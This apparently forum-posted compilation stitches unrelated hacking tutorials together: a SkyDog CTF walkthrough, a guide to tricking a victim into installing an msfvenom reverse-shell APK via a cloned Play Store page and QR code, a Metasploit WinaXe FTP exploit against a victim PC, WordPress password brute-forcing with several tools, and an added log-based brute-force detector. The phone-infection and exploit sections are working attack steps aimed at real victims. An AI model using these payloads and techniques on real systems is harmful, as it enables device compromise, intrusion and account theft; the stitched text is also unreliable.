[Guide] How to Hack the SkyDog Con CTF – Catch Me If You Can VM - NINZA - 04-25-2020

SkyDog is the second VM in the CTF series created by James Brower. It is configured with DHCP, so its IP address is assigned automatically. The VM is based on Catch Me If You Can, a movie about Frank, a conman, so it is fair to assume that broad OSINT concepts will be used in it. This is an amazing VM as it calls on both hacking and forensic skills. The author of this VM has given us hints about all eight flags, as below:

Flag # 1: Don’t go, Home Frank! There’s a Hex on Your House.
Flag # 2: Obscurity or Security?
Flag # 3: Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.
Flag # 4: A Good Agent is Hard to Find.
Flag # 5: The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices
Flag # 6: Where in the World is Frank?
Flag # 7: Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!
Flag # 8: Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!

Apart from this, we know that the flags are MD5 hashes.

Penetrating Methodology
Let us find our target first by using the following command in the Kali terminal:

    netdiscover

We can clearly see that our target IP is 192.168.1.100. Now that we have identified our target, let’s scan the IP with nmap.

    nmap -p- -sV 192.168.1.100

With the assistance of nmap, you can see that ports 22, 80, 443 and 22222 are running SSH (closed), HTTP, HTTPS and SSH (open) respectively. Here you can observe that, using port forwarding, the SSH service has been moved from its default port 22 to port 22222: it is closed on 22 and open on 22222. This is a minor security feature to throw off attackers; as the scan shows, a full port sweep (-p-) still finds it.

As port 80 is open, along with 443, we can open this IP in a browser. The home page has nothing to go on, so we checked its page source. In the page source you will find a directory. Let’s open it and see what it has got for us.

The directory didn’t have much to go on either, so we viewed the page source again and there we found a hex value. From the first hint given by the author, Flag # 1: Don’t go, Home Frank! There’s a Hex on Your House, we can tell that this hex is our first flag. Let’s convert the hex by using the following command in the Kali terminal, putting the hex value from the page source in place of the placeholder:

    echo "<hex value from the page source>" | xxd -p -r

Here:
xxd: creates a hex dump, or reverses one
-p: uses the plain hex dump format
-r: reverses the operation, converting hex back into the original bytes

Using the above command the hex is converted, as you can see in the image above. When we then de-hash the resulting MD5 value, the flag is nmap, which means our next hint is nmap and that is where we should look.
As explained earlier, nmap showed that the SSH service has been given a security feature (a non-default port), so we should poke it by typing the following command:

    ssh 192.168.1.100 -p22222

And so we have our next flag; upon de-hashing, it turns out to be encrypted.

We will find our next flag somewhere in the encryption on the webpage. The most basic encryption given to the webpage is a security certificate. Let’s check that out. Click on the highlighted area as shown in the above picture and a dialogue box will open. Click on the security tab as shown in the above image, and then click on the View Certificate button. In the certificate you will find the third flag. When converted, our next flag turns out to be personnel.

I had assumed “personne1” as a directory, so let’s open it in a browser. As shown, the directory says “you do not appear to be from an FBI workstation”, which means there is an FBI workstation somewhere. I looked back through every page source we had and found that we need Internet Explorer 4 for the FBI workstation.

Now reload the personnel directory and capture the request using Burp Suite, which will help you change the browser. In Burp Suite, once you have captured the request, change the User-Agent from “Linux x86_64” to “MSIE 4.0” as shown in the images. Once you forward the request from Burp Suite, the personnel directory page will load. There you will find your next flag and a hint with that flag, i.e. we have to add the prefix ‘new’ to whatever flag we get after de-hashing the value.

Upon converting, our flag is evidence. So, adding the prefix new, our flag becomes newevidence.

Now the directory /newevidence takes us to the FBI login portal. We don’t have any username or password, and no clue about them either, so I explored its page source. In the page source we found two important things, i.e.
evidence.txt

When opened, evidence.txt gave us our next flag. Once converted, the flag is panam.

Now let’s open newevidence, which we found in the previous flag. It shows us an image, so there must be a steganographic message hidden in it. Use the following command to extract it:

    steghide extract -sf newevidence.jpeg

The hidden file was flag.txt. To read the flag, type:

    cat flag.txt

By de-hashing the flag we get ILoveFrance. We also have a clue, i.e. iheartbrenda. Both the flag and the clue are important, so make a note of them.

For our seventh flag, we have the hint: Flag # 7: Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive! In this hint, “I am the fastest man alive” is the introductory dialogue of The Flash. Even in the movie, Frank uses the fake name Barry Allen, the original name of the Flash. Therefore, Barry Allen can be our username. Let’s log in over the SSH port using the username barryallen. When it asked for the password I tried both ILoveFrance and iheartbrenda and, fortunately, iheartbrenda was the correct password.

Once we were logged in, we used the following commands to find our flag:

    ls → to list all the files
    cat flag.txt → to read the flag

And so we have our next flag. Once de-hashed, the flag was the flash.

As we have both the username and the password for the SSH login, we can use scp here. You can use SCP (the scp command) to securely copy files and directories between remote hosts without starting an FTP session or logging into the remote systems explicitly.

    scp -P 22222 [email protected]:/home/barryallen/security-system.data /root/Desktop/file

Once you have the file, unzip it by typing:

    unzip file

Now, by using the following command, we complete our CTF challenge.
    volatility -f security-system.data notepad

YAY! Once again, we have completed a CTF challenge successfully.

A QR Code is a 2-dimensional barcode which can be scanned using smartphones or dedicated QR readers. QR Codes can link directly to contact numbers, websites, usernames, photos, SMS, e-mails and even encryptions, but they do not end there. QR Codes are a big deal in Japan, and it’s just a matter of time before they take over the whole world as SEO grows.
Till now every one of you must have understood that QR Codes is the ‘next big thing’, let’s make it a big thing but in regards to hacking. Yes! In this article, we are going to hack our victim’s mobile in some easy steps using QR Code. And all you need for this is your beloved Kali Linux.
Our step is to create a pernicious file using msfvenom.
    msfvenom –p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk

Now open SET. Through SET we will alter HTA attack into an APK attack to gain access of the victim’s Smartphone. Thus, from the SET menu select the 2nd option which indicates Website Attack Vectors.
And then select Site Cloner by typing 2. When you type the said 2 option, it will ask you to enter the URL that you want to clone. Here give the URL of the play store.
Furthermore, save the launcher.apk file that you created using msfvenom to /var/www/html/. Also change the name of launcher.hta to lancher.apk that your SET had just created, as shown below. Now add the QR Code Extension to your Chrome. The QR Code Extension will generate a QR Code for you according to your attack. Now start multi/handler so you have your session in time, and for this type:

    use multi/handler
    set payload android/meterpreter/reverse_tcp
    set lhost 192.168.1.100
    set lport 6666
    run

Now you can move ahead and make the victim scan your code and install the app. And voila! As soon as the scanning of the code is completed, you will have your meterpreter session.

This module exploits a buffer overflow in the WinaXe 7.7 FTP client. This issue is triggered when a client connects to the server and is expecting the Server Ready response.
Exploit Targets
WinaXe 7.7 FTP client
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
    msf exploit (winaxe_server_ready)>set lhost 192.168.0.106
    msf exploit (winaxe_server_ready)>set srvhost 192.168.0.106
    msf exploit (winaxe_server_ready)>set payload windows/meterpreter/reverse_tcp
    msf exploit (winaxe_server_ready)>exploit

Now send the link to the victim. When the victim enters the connection details, wait for the WinaXe FTP connection. You will get the victim's meterpreter session.

Brute force attack using Burp Suite
To make Burp Suite work, we first have to turn on the manual proxy. Go to the browser settings and choose Preferences. Then select the Advanced option, go to Network and select Settings.

Now select Manual proxy configuration, type your localhost address in the HTTP proxy field and set the port to 8080. Click OK.

Now open the WordPress site on your PC and it will ask you for the username and password. Before entering them, start Burp Suite, select the Proxy tab and turn on interception by clicking the Intercept is on/off button.

With interception turned on, type any password you like so that Burp Suite can capture the request. Look at the image and notice the last line of the captured data: it shows that I tried to log in by typing admin:admin as username and password respectively.

Send the captured request to Intruder by right-clicking in the request area and choosing the Send to Intruder option, or simply press Ctrl + I.

Now open the Intruder tab, select the Positions tab and, without disturbing the data, click the Clear button on the right side of the frame.

Now select the values I have selected in the image and click the Add button on the right side of the frame. This configures the positions where payloads will be inserted into the base request.

Select the attack type, which determines the way in which payloads are assigned to payload positions. I will choose cluster bomb, as the number of payload sets depends on the attack type and we have 2 payload positions. Click on start attack.

Click on payload set, which will show the two numbers 1 and 2; select number 1 for the first payload position. Then click the Load button in payload options and configure the simple list of strings that will be used as the payload, or add the path of any dictionary containing usernames only. Similarly, select number 2 for the other payload position and add the path of any dictionary containing passwords only. Click on start attack.

The brute force attack will now try every combination of both payloads to log in with a username and password.

When the attack has finished, you can identify the valid credential by checking the status and length, which will be different from the rest of the combinations.

From the result, user:bitnami is the username and password respectively.
Brute force attack using wpscan

WPScan is a black box vulnerability scanner for WordPress which is installed by default in Kali Linux. For a WordPress brute force you need a good dictionary, or you can make your own dictionary for the attack.

    ruby ./wpscan.rb -url 192.168.1.14 --wordlist /root/Desktop/pass.txt --username user

In this brute force attack I have just added a wordlist for the password. From the result, user:bitnami is the login and password respectively.
Brute force attack using metasploit

This module will test WordPress logins on a range of machines and report successful logins. If you have loaded a database plug-in and connected to a database, this module will record successful logins and hosts so you can track your access.

    msf > use auxiliary/scanner/http/wordpress_login_enum
    msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.4
    msf auxiliary(wordpress_login_enum) > set rport 80
    msf auxiliary(wordpress_login_enum) > set user_file /root/Desktop/user.txt
    msf auxiliary(wordpress_login_enum) > set pass_file /root/Desktop/pass.txt
    msf auxiliary(wordpress_login_enum) > exploit

WordPress brute force successful for login user:bitnami as username and password.
Brute force attack using OWASP ZAP

ZAP is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. Now we will use this tool for a brute force attack; the whole process is the same as with Burp Suite.

Start OWASP ZAP and turn on the manual proxy: go to the browser settings and choose Preferences, then select the Advanced option, go to Network and select Settings. Select Manual proxy configuration, type your localhost address in the HTTP proxy field and set the port to 8080. Click OK.

Now once again open the WordPress site on your PC and it will ask for the username and password.

ZAP will capture the data; as you can see, I have logged in with user as the username and password as the password. You can see it in the Request section of the tool. Select the characters which you entered in the page before. I will select only the password from the captured data and then right-click for the Fuzz option.

When you click on Fuzz, a new window, ‘Fuzzer’, will open. Click the Add button on the left of the frame and it will open a new Add Payload window. Click on Select and choose your dictionary for the attack.

Click the Add button again and then click on Start Fuzzer.

After fuzzing starts, a new screen will open. Click the Options button, select the depth first radio button for the payload replacement strategy, tick the follow redirects check box and click to start fuzzing.

When the attack has finished, you can identify the valid credential by checking the state and size of the response header, which will be different from the rest of the combinations.

From the result, bitnami is the password for the login user.
This script uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are stored using the credentials library.

Open the Kali terminal and type the following Nmap command:

    nmap -sV --script http-wordpress-brute --script-args 'userdb=/root/Desktop/login.txt,passdb=/root/Desktop/pass.txt, http-wordpress-brute.hostname=domain.com,http-wordpress-brute.thread=3,brute.firstonly=true' 192.168.1.17
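
Seen from the defender's side, every brute-force run described in the sections above shows up as a burst of POST requests to wp-login.php. The following is an added example, not part of the original post, that flags such bursts in web server access logs; the log lines are constructed, and it assumes the combined access log format and WordPress's default behaviour of answering a failed login with 200 and a successful one with a 302 redirect.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: Apache/Nginx "combined" access log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_login_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Report source IPs that send >= threshold login POSTs within `window`."""
    events = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not m["path"].split("?")[0].endswith("/wp-login.php"):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events[m["ip"]].append((ts, int(m["status"])))

    report = {}
    for ip, evs in events.items():
        evs.sort()
        burst, start, fails, hit = False, 0, 0, False
        for end, (ts, status) in enumerate(evs):
            while ts - evs[start][0] > window:   # slide the window forward
                start += 1
            burst = burst or (end - start + 1) >= threshold
            # Assumption: default WordPress answers a failed login with 200
            # and a successful one with a 302 redirect.
            if status == 302 and fails >= threshold:
                hit = True                       # a guess succeeded after failures
            elif status == 200:
                fails += 1
        if burst:
            report[ip] = {"attempts": len(evs), "success_after_failures": hit}
    return report

def sample_log():
    """Constructed log lines (documentation IP ranges), not taken from the page."""
    fmt = '{ip} - - [25/Apr/2020:10:00:{s:02d} +0000] "{m} /wp-login.php HTTP/1.1" {st} 3950'
    lines = [fmt.format(ip="192.0.2.10", s=s, m="POST", st=200) for s in range(5)]
    lines.append(fmt.format(ip="192.0.2.10", s=5, m="POST", st=302))
    lines.append(fmt.format(ip="198.51.100.7", s=9, m="GET", st=200))
    lines.append(fmt.format(ip="198.51.100.7", s=12, m="POST", st=302))
    return lines

if __name__ == "__main__":
    for ip, info in find_login_bruteforce(sample_log()).items():
        print(ip, info)
```

An IP reported with success_after_failures set means a guessed credential worked and the account should be treated as compromised; login rate limiting, account lockout and a second authentication factor are what stop the dictionary runs themselves.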